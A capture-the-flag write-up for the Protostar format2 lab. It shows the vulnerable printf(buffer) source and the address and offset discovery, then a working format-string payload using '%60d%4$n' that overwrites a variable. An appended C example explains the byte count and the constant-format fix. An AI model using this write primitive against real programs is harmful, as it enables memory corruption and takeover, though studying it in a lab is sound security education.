      fgets(buffer, sizeof(buffer), stdin);
      /* the bug: user input is used as the format string */
      printf(buffer);

      if(target == 64) {
        printf("you have modified the target :)\n");
      } else {
        printf("target is %d :(\n", target);
      }
    }

    int main(int argc, char **argv)
    {
      vuln();
    }

This challenge is a slight variation of the previous one. On top of writing to a specific address, this time we’ll have to write a specific number: 64.
Like the previous challenge, let’s find target’s address and where the string is written on the stack by printf.

    user@protostar:~$ /opt/protostar/bin/./format2
    ABABABAB%x.%x.%X.%X.%X.%X.%X.%X.%X.%X
    ABABABAB200.�b7fd8420.BFFFF604.42414241.42414241.C32E7825.252E7825.58252E58.2E58252E.252E5825
    target is 0 :(
    user@protostar:~$ objdump -t /opt/protostar/bin/format2 | grep target
    080496e4 g O .bss 00000004 target
    user@protostar:~$

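We have to write to 0x080496e4, and the start of our string shows up as the 4th argument on the stack. Now how can we write exactly 64? %n stores the number of bytes printed so far, so we can use the same trick from format0 and pad the output with a minimum field width: the 4 address bytes plus a 60-character field make 64.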

    user@protostar:~$ python -c 'print "\xe4\x96\x04\x08"+"%60d"+"%4$n"' > payload
    user@protostar:~$ cat payload - | /opt/protostar/bin/./format2
    �� 512
    you have modified the target :)
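
The byte count behind the 4 + 60 = 64 arithmetic, and the one-line fix for `printf(buffer)`, as an added example that is not part of the original write-up. The function names `bytes_before_n` and `echo_as_data` and the `"AAAA"` stand-in for the 4 address bytes are assumptions made for illustration; `%n` here only stores into a pointer the program passes itself.

```c
#include <stdio.h>
#include <string.h>

/* Count the bytes a printf-family call has emitted when %n is reached,
 * for the layout used above: 4 prefix bytes (constructed stand-in for the
 * address) followed by one integer printed with a minimum field width.
 * The format string is a fixed literal, never user input. */
int bytes_before_n(int min_width, int value)
{
    char out[256];
    int count = -1;
    snprintf(out, sizeof out, "%s%*d%n", "AAAA", min_width, value, &count);
    return count;
}

/* Hardened form of the challenge's printf(buffer): the input is passed as
 * data to a constant "%s" format, so directives inside it are never parsed.
 * Returns the number of bytes the input occupies. */
int echo_as_data(const char *input, char *out, size_t out_len)
{
    return snprintf(out, out_len, "%s", input);
}

int main(void)
{
    char out[64];

    /* 4 prefix bytes + a 60-wide field = 64, the value the challenge wants */
    printf("width 60 -> %d bytes\n", bytes_before_n(60, 512));
    /* the width is only a minimum: "512" needs 3 characters, so 4 + 3 */
    printf("width  2 -> %d bytes\n", bytes_before_n(2, 512));

    /* the same directives, treated as plain text by the fixed call */
    echo_as_data("%60d%4$n", out, sizeof out);
    printf("echoed literally: %s\n", out);
    return 0;
}
```

Compiling the original source with `-Wformat -Wformat-security` makes GCC warn about the `printf(buffer)` call.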